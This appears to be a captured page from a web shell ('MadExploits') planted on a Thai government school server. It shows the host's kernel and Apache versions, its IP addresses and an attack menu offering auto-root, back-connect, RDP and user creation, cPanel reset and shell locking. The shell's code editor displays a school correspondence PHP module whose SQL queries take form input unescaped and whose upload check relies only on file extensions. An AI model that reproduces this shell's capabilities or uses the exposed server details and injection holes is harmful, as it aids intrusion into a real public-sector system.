Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
modules /
book /
expand /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
book_detail2.php
6.45
KB
-rw-r--r--
bookdetail_receive_saraban.php
12.01
KB
-rw-r--r--
bookdetail_receive_saraban_non...
7.99
KB
-rw-r--r--
index.php
1.11
KB
-rw-r--r--
livesearch_4.php
681
B
-rw-r--r--
receive.php
12.65
KB
-rw-r--r--
receive_file.php
2.05
KB
-rw-r--r--
receive_none.php
10.18
KB
-rw-r--r--
register_receive.php
5.25
KB
-rw-r--r--
select_send.php
9.17
KB
-rw-r--r--
send_book.php
21.66
KB
-rw-r--r--
send_detail.php
8.03
KB
-rw-r--r--
send_report_book.php
16.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : send_book.php
<script type="text/javascript" src="../../../css/js/calendarDateInput2.js"></script> <?php defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); require_once "../time_inc.php"; $user=$remote_user_id; /////////////////////////////////// if($index==""){ $index=1; } //ส่วนหัว echo "<br />"; if(!(($index==1) or ($index==2))){ echo "<table width='100%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>หนังสือส่ง</strong></font></td></tr>"; echo "</table>"; } //ส่วนฟอร์มรับข้อมูล if($index==1){ $timestamp = mktime(date("H"), date("i"),date("s"), date("m") ,date("d"), date("Y")) ; //timestamp เวลาปัจจุบัน $rand_number=rand(); $ref_id = $timestamp."x".$rand_number; //$_SESSION ['ref_id'] = $ref_id ; echo "<form Enctype = multipart/form-data id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size=3><B>ส่งหนังสือราชการ</Font>"; echo "</Cener>"; echo "<Br>"; echo "<table border='1' width='700' id='table1' style='border-collapse: collapse' bordercolor='#C0C0C0'>"; echo "<tr bgcolor='#003399'>"; echo "<td colspan='4' height='23' align='left'><font size='2' color='#FFFFFF'> กรุณาระบุรายละเอียด</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><span lang='th'><font size='2' color='#0000FF'>จาก </font></span></td>"; echo "<td width='514' colspan='3' align='left'>"; $sql_school= "select * from system_school where school_code='$remote_user_office' "; $dbquery_school = mysqli_query($connect,$sql_school); $result_school = mysqli_fetch_array($dbquery_school); echo " <input type='radio' name='workgroup' value='$result_school[school_code]' checked> $result_school[school_name]"; echo "</td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ถึง </font></span></td>"; echo "<td colspan='3' align='left'> <input type='radio' value='saraban' name='sendto'> สารบรรณกลาง สพท."; $sql_workgroup= "select * from system_workgroup"; $dbquery_workgroup = mysqli_query($connect,$sql_workgroup); While ($result_workgroup = mysqli_fetch_array($dbquery_workgroup)){ echo "<br> <input type='radio' name='sendto' value='$result_workgroup[workgroup]'> $result_workgroup[workgroup_desc]"; } echo "<br> <input type='radio' value='all' name='sendto'> สถานศึกษารัฐบาลทุกแห่ง"; echo "<br> <input type='radio' value='some' name='sendto' onClick=\"window.open('../../../modules/book/expand/select_send.php?sd_index=some&ref_id=$ref_id','PopUp','width=900,height=600,scrollbars,status'); \"> สถานศึกษาบางแห่ง"; echo "</td></tr>"; echo "<tr>"; echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>ระดับความสำคัญ </font></span></td>"; echo "<td colspan='3' align='left'> <input type='radio' name='level' value='1' checked><font size='2' color='#006600'>ปกติ</font><span lang='en-us'><font size='2'> </font><input type='radio' name='level' value='2'></span><font size='2'><font color='#780634'>ด่วน</font> </font><input type='radio' name='level' value='3'><font size='2'><font color='#993300'>ด่วนมาก</font> </font><input type='radio' name='level' value='4'><font size='2' color='#FF0000'>ด่วนที่สุด</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>ความลับ </font></span></td>"; echo "<td colspan='3' align='left'> <input type='radio' name='secret' value='0' checked><font size='2' color='#006600'>ไม่ลับ</font><span lang='en-us'><font size='2'> </font><input type='radio' name='secret' value='1'><font size='2' color='#FF0000'>ลับ</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>เลขที่หนังสือ </font></span></td><td> <FONT SIZE='2' COLOR=''></FONT><input type='text' name='bookno' size='20' value='ที่' style='background-color: #99ccff'> ลงวันที่</td>"; echo "<td colspan='2' align='left'>"; ?> <script>DateInput('signdate', true, 'YYYY-MM-DD')</script> <?php echo "</td>"; echo "</tr>"; echo "<tr>"; echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>เรื่อง </font></span></td>"; echo "<td colspan='3' align='left'> <input type='text' name='subject' size='76' style='background-color: #99ccff'></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right' height='47'><span lang='th'><font size='2' color='#0000FF'>เนื้อหาโดยสรุป </font></span></td>"; echo "<td height='47' width='514' colspan='3' align='left'> <textarea rows='5' name='detail' cols='55' style='background-color: #99ccff' ></textarea></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='371' align='right' colspan='2'><p align='center'><font size='2' color='#800000'>แนบไฟล์(ถ้ามี)</font></td>"; echo "<td width='238' align='center' colspan='2'><p align='center'><font size='2' color='#800000'>คำอธิบายไฟล์</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ 1 </font></td>"; echo "<td width='274'> <input type='file' name='myfile1' size='26' style='background-color: #99ccff'></td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile1' size='31' style='background-color: #E5E5FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ 2 </font></td>"; echo "<td width='274'> <input type='file' name='myfile2' size='26' style='background-color: #99ccff'> </td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile2' size='31' style='background-color: #E5E5FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ 3 </font></td>"; echo "<td width='274'> <input type='file' name='myfile3' size='26' style='background-color: #99ccff'> </td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile3' size='31' style='background-color: #E5E5FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ 4 </font></td>"; echo "<td width='274'> <input type='file' name='myfile4' size='26' style='background-color: #99ccff'> </td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile4' size='31' style='background-color: #E5E5FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ 5 </font></td>"; echo "<td width='274'> <input type='file' name='myfile5' size='26' style='background-color: #99ccff'> </td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile5' size='31' style='background-color: #E5E5FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td align='center' colspan='4'><FONT SIZE='2' COLOR='#CC9900'>เฉพาะไฟล์ doc, docx, pdf, xls, xlsx, gif, jpg, zip, rar เท่านั้น</FONT></td>"; echo "</tr>"; echo "<input name='ref_id' type='hidden' value='$ref_id'>"; echo "<tr>"; echo "<td align='center' colspan='4'><BR><INPUT TYPE='button' name='smb' id='smb' value='ตกลง' onclick='goto_url(1)'> <input type='reset' value='Reset' name='reset'></td>"; echo "</tr>"; echo "</Table>"; echo "<input type='hidden' name='remote_user_office' value='$remote_user_office'>"; echo "<input type='hidden' name='remote_user_id' value='$remote_user_id'>"; echo "<input type='hidden' name='remote_login_status' value='$remote_login_status'>"; echo "<input type='hidden' name='remote_sync' value='$remote_sync'>"; echo "</form>"; } //ส่วนบันทึกข้อมูล if($index==4){ $sizelimit = 20000*1024 ; //ขนาดไฟล์ $subject = $_POST ['subject'] ; $detail = $_POST ['detail'] ; $dfile1 = $_POST ['dfile1'] ; $dfile2 = $_POST ['dfile2'] ; $dfile3 = $_POST ['dfile3'] ; $dfile4 = $_POST ['dfile4'] ; $dfile5 = $_POST ['dfile5'] ; /// file $myfile1 = $_FILES ['myfile1'] ['tmp_name'] ; $myfile1_name = $_FILES ['myfile1'] ['name'] ; $myfile1_size = $_FILES ['myfile1'] ['size'] ; $myfile1_type = $_FILES ['myfile1'] ['type'] ; $array_last1 = explode("." ,$myfile1_name) ; $c1 =count ($array_last1) - 1 ; $lastname1 = strtolower ($array_last1 [$c1] ) ; $alert_files=""; $alert_filesize=""; if ($myfile1<>"") { if ($lastname1 =="doc" or $lastname1 =="docx" or $lastname1 =="rar" or $lastname1 =="pdf" or $lastname1 =="xls" or $lastname1 =="xlsx" or $lastname1 =="zip" or $lastname1 =="jpg" or $lastname1 =="gif" ) { }else { $alert_files.= "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile1_name " ; } If ($myfile1_size>$sizelimit) { $alert_filesize.= "-ไฟล์ $myfile1_name มีขนาดใหญ่กว่าที่กำหนด " ; } } #### $myfile2 = $_FILES ['myfile2'] ['tmp_name'] ; $myfile2_name = $_FILES ['myfile2'] ['name'] ; $myfile2_size = $_FILES ['myfile2'] ['size'] ; $myfile2_type = $_FILES ['myfile2'] ['type'] ; $array_last2 = explode("." ,$myfile2_name) ; $c2 =count ($array_last2) - 1 ; $lastname2 = strtolower ($array_last2 [$c2] ) ; if ($myfile2<>"") { if ($lastname2 =="doc" or $lastname2 =="docx" or $lastname2 =="rar" or $lastname2 =="pdf" or $lastname2 =="xls" or $lastname2 =="xlsx" or $lastname2 =="zip" or $lastname2 =="jpg" or $lastname2 =="gif") { }else { $alert_files.= "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile2_name " ; } If ($myfile2_size>$sizelimit) { $alert_filesize.= "-ไฟล์ $myfile2_name มีขนาดใหญ่กว่าที่กำหนด" ; } } #### $myfile3 = $_FILES ['myfile3'] ['tmp_name'] ; $myfile3_name = $_FILES ['myfile3'] ['name'] ; $myfile3_size = $_FILES ['myfile3'] ['size'] ; $myfile3_type = $_FILES ['myfile3'] ['type'] ; $array_last3 = explode("." ,$myfile3_name) ; $c3 =count ($array_last3) - 1 ; $lastname3 = strtolower ($array_last3 [$c3] ) ; if ($myfile3<>"") { if ($lastname3 =="doc" or $lastname3 =="docx" or $lastname3 =="rar" or $lastname3 =="pdf" or $lastname3 =="xls" or $lastname3 =="xlsx" or $lastname3 =="zip" or $lastname3 =="jpg" or $lastname3 =="gif") { }else { $alert_files.= "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile3_name " ; } If ($myfile3_size>$sizelimit) { $alert_filesize.= "-ไฟล์ $myfile3_name มีขนาดใหญ่กว่าที่กำหนด " ; } } #### $myfile4 = $_FILES ['myfile4'] ['tmp_name'] ; $myfile4_name = $_FILES ['myfile4'] ['name'] ; $myfile4_size = $_FILES ['myfile4'] ['size'] ; $myfile4_type = $_FILES ['myfile4'] ['type'] ; $array_last4 = explode("." ,$myfile4_name) ; $c4 =count ($array_last4) - 1 ; $lastname4 = strtolower ($array_last4 [$c4] ) ; if ($myfile4<>"") { if ($lastname4 =="doc" or $lastname4 =="docx" or $lastname4 =="rar" or $lastname4 =="pdf" or $lastname4 =="xls" or $lastname4 =="xlsx" or $lastname4 =="zip" or $lastname4 =="jpg" or $lastname4 =="gif") { }else { $alert_files.= "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile4_name " ; } If ($myfile4_size>$sizelimit) { $alert_filesize.= "-ไฟล์ $myfile4_name มีขนาดใหญ่กว่าที่กำหนด" ; } } #### $myfile5 = $_FILES ['myfile5'] ['tmp_name'] ; $myfile5_name = $_FILES ['myfile5'] ['name'] ; $myfile5_size = $_FILES ['myfile5'] ['size'] ; $myfile5_type = $_FILES ['myfile5'] ['type'] ; $array_last5 = explode("." ,$myfile5_name) ; $c5 =count ($array_last5) - 1 ; $lastname5 = strtolower ($array_last5 [$c5] ) ; if ($myfile5<>"") { if ($lastname5 =="doc" or $lastname5 =="docx" or $lastname5 =="rar" or $lastname5 =="pdf" or $lastname5 =="xls" or $lastname5 =="xlsx" or $lastname5 =="zip" or $lastname5 =="jpg" or $lastname5 =="gif") { }else { $alert_files.= "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile5_name " ; } If ($myfile5_size>$sizelimit) { $alert_filesize.= "-ไฟล์ $myfile5_name มีขนาดใหญ่กว่าที่กำหนด " ; } } #### //// if(!(isset($_POST['sendto']))){ $_POST['sendto']=""; } if($_POST['sendto']=="" || $_POST['subject']=="" ||$_POST['detail'] ==""){ echo "<CENTER><font size=\"2\" color=\"#008000\">กรอกข้อมูลไม่ครบ หรืออาจอัพโหลดไฟล์ใหญ่เกินข้อกำหนดของServer<br><br>"; echo "<input type=\"button\" value=\"แก้ไขข้อมูล\" onClick=\"javascript:history.go(-1)\" ></CENTER>" ; exit(); } #จบ // check file size file name if ($alert_files<> "" || $alert_filesize<> "" ) { echo "<B><FONT SIZE=2 COLOR=#990000>มีข้อผิดพลาดเกี่ยวกับไฟล์ของคุณ ดังรายละเอียด</FONT></B><BR>" ; echo "<FONT SIZE=2 COLOR=#990099>" ; echo $alert_files ; echo $alert_filesize ; echo "</FONT>" ; echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>" ; exit () ; } //ตรวจสอบว่ามีผู้รับหรือยัง สำหรับโรงเรียน.ส่ง // *** $sql_send_num = mysqli_query($connect,"SELECT * FROM book_sendto_answer WHERE ref_id='$_POST[ref_id]' ") ; $send_num = mysqli_num_rows ($sql_send_num) ; if ($send_num==0 and $_POST['sendto']=='some') { echo "<div align='center'>"; echo "<B><FONT SIZE=2 COLOR=#990000>ยังไม่ได้ระบุผู้รับหนังสือ</FONT></B><BR><BR>" ; echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>" ; echo "</div>"; exit () ; } //ส่วนการบันทึก $day_now=date("Y-m-d H:i:s"); $book_type=2; //ผู้ส่งคือโรงเรียน //ตรวจสอบ ref_id if(!(isset($_POST['ref_id']))){ echo "<script>alert('มีข้อผิดพลาดเกี่ยวกับเลขอ้างอิงในระบบ ยกเลิกการส่งหนังสือในครั้งนี้ กรุณาส่งใหม่อีกครั้ง'); document.location.href='?file=send_book&index=1&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync';</script>"; exit(); } if($_POST['ref_id']==""){ echo "<script>alert('มีข้อผิดพลาดเกี่ยวกับเลขอ้างอิงในระบบ ยกเลิกการส่งหนังสือในครั้งนี้ กรุณาส่งใหม่อีกครั้ง'); document.location.href='?file=send_book&index=1&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync';</script>"; exit(); } $sql = "insert into book_main (book_type, office, sender, level, secret, bookno, signdate, subject, detail, ref_id, send_date) values ('$book_type', $_POST[workgroup], '$user', '$_POST[level]', '$_POST[secret]', '$_POST[bookno]', '$_POST[signdate]','$_POST[subject]','$_POST[detail]','$_POST[ref_id]','$day_now')"; $dbquery = mysqli_query($connect,$sql); if ($myfile1<>"" ) { $myfile1name=$_POST['ref_id']."_1.".$lastname1 ; copy ($myfile1, "../../../modules/book/upload_files/".$myfile1name) ; $sql = "insert into book_filebook (ref_id, file_name, file_des) values ('$_POST[ref_id]','$myfile1name','$dfile1')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile1) ; } if ($myfile2<>"") { $myfile2name=$_POST['ref_id']."_2.".$lastname2 ; copy ($myfile2, "../../../modules/book/upload_files/".$myfile2name) ; $sql = "insert into book_filebook (ref_id, file_name, file_des) values ('$_POST[ref_id]','$myfile2name','$dfile2')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile2) ; } if ($myfile3<>"") { $myfile3name=$_POST['ref_id']."_3.".$lastname3 ; copy ($myfile3, "../../../modules/book/upload_files/".$myfile3name) ; $sql = "insert into book_filebook (ref_id, file_name, file_des) values ('$_POST[ref_id]','$myfile3name','$dfile3')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile3) ; } if ($myfile4<>"") { $myfile4name=$_POST['ref_id']."_4.".$lastname4 ; copy ($myfile4, "../../../modules/book/upload_files/".$myfile4name) ; $sql = "insert into book_filebook (ref_id, file_name, file_des) values ('$_POST[ref_id]','$myfile4name','$dfile4')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile4) ; } if ($myfile5<>"") { $myfile5name=$_POST['ref_id']."_5.".$lastname5 ; copy ($myfile5, "../../../modules/book/upload_files/".$myfile5name) ; $sql = "insert into book_filebook (ref_id, file_name, file_des) values ('$_POST[ref_id]','$myfile5name','$dfile5')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile5) ; } if($_POST['sendto']=='all') { $sql_sendto = "select school_code from system_school where school_code != '$remote_user_office' and school_type='1' order by school_code"; $dbquery_sendto = mysqli_query($connect,$sql_sendto); While ($result_sendto = mysqli_fetch_array($dbquery_sendto)){ $sql= "insert into book_sendto_answer (send_level, ref_id, send_to) values ('3', '$_POST[ref_id]','$result_sendto[school_code]')"; $dbquery = mysqli_query($connect,$sql); } } else if($_POST['sendto']!='some'){ $sql= "insert into book_sendto_answer (send_level, ref_id, send_to) values ('2', '$_POST[ref_id]','$_POST[sendto]')"; $dbquery = mysqli_query($connect,$sql); } echo "<script>document.location.href='?file=send_report_book&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync';</script>\n"; } //end index4 ?> <script> function goto_url(val){ if(val==0){ callfrm("?file=send_book"); // page ย้อนกลับ }else if(val==1){ var v2 = document.frm1.subject.value; var v3 = document.frm1.detail.value; var file1 = document.frm1.myfile1.value; var file2 = document.frm1.myfile2.value; var file3 = document.frm1.myfile3.value; var file4 = document.frm1.myfile4.value; var file5 = document.frm1.myfile5.value; var vdfile1 = document.frm1.dfile1.value; var vdfile2 = document.frm1.dfile2.value; var vdfile3 = document.frm1.dfile3.value; var vdfile4 = document.frm1.dfile4.value; var vdfile5 = document.frm1.dfile5.value; var w_group=document.getElementsByName("workgroup"); var wg=0; for(i=0;i<w_group.length;i++){ if(w_group[i].checked==true){ wg=1; } } if (wg==0) { alert("กรุณาเลือกผู้ส่ง (จาก)"); } else if (document.frm1.bookno.value=="") { alert("กรุณากรอกเลขที่หนังสือ"); document.frm1.bookno.focus(); } else if (v2.length==0) { alert("กรุณากรอกชื่อเรื่อง"); document.frm1.subject.focus(); } else if (v3.length==0) { alert("กรุณากรอกเนื้อหาโดยสรุป"); document.frm1.detail.focus(); } else if (file1=="") { alert("กรุณาเลือกไฟล์"); document.frm1.myfile1.focus(); } else if ((file1!="") && (vdfile1=="")) { alert("กรุณากรอก คำอธิบายไฟล์"); document.frm1.dfile1.focus(); } else if ((file2 !="") && (vdfile2=="")) { alert("กรุณากรอก คำอธิบายไฟล์"); document.frm1.dfile2.focus(); } else if ((file3!="") && (vdfile3=="")) { alert("กรุณากรอก คำอธิบายไฟล์"); document.frm1.dfile3.focus(); } else if ((file4 !="") && (vdfile4=="")) { alert("กรุณากรอก คำอธิบายไฟล์"); document.frm1.dfile4.focus(); } else if ((file5!="") && (vdfile5=="")) { alert("กรุณากรอก คำอธิบายไฟล์"); document.frm1.dfile5.focus(); } else{ document.getElementById("smb").style.display="none"; callfrm("?file=send_book&index=4"); //page ประมวลผล } } } </script>
Close
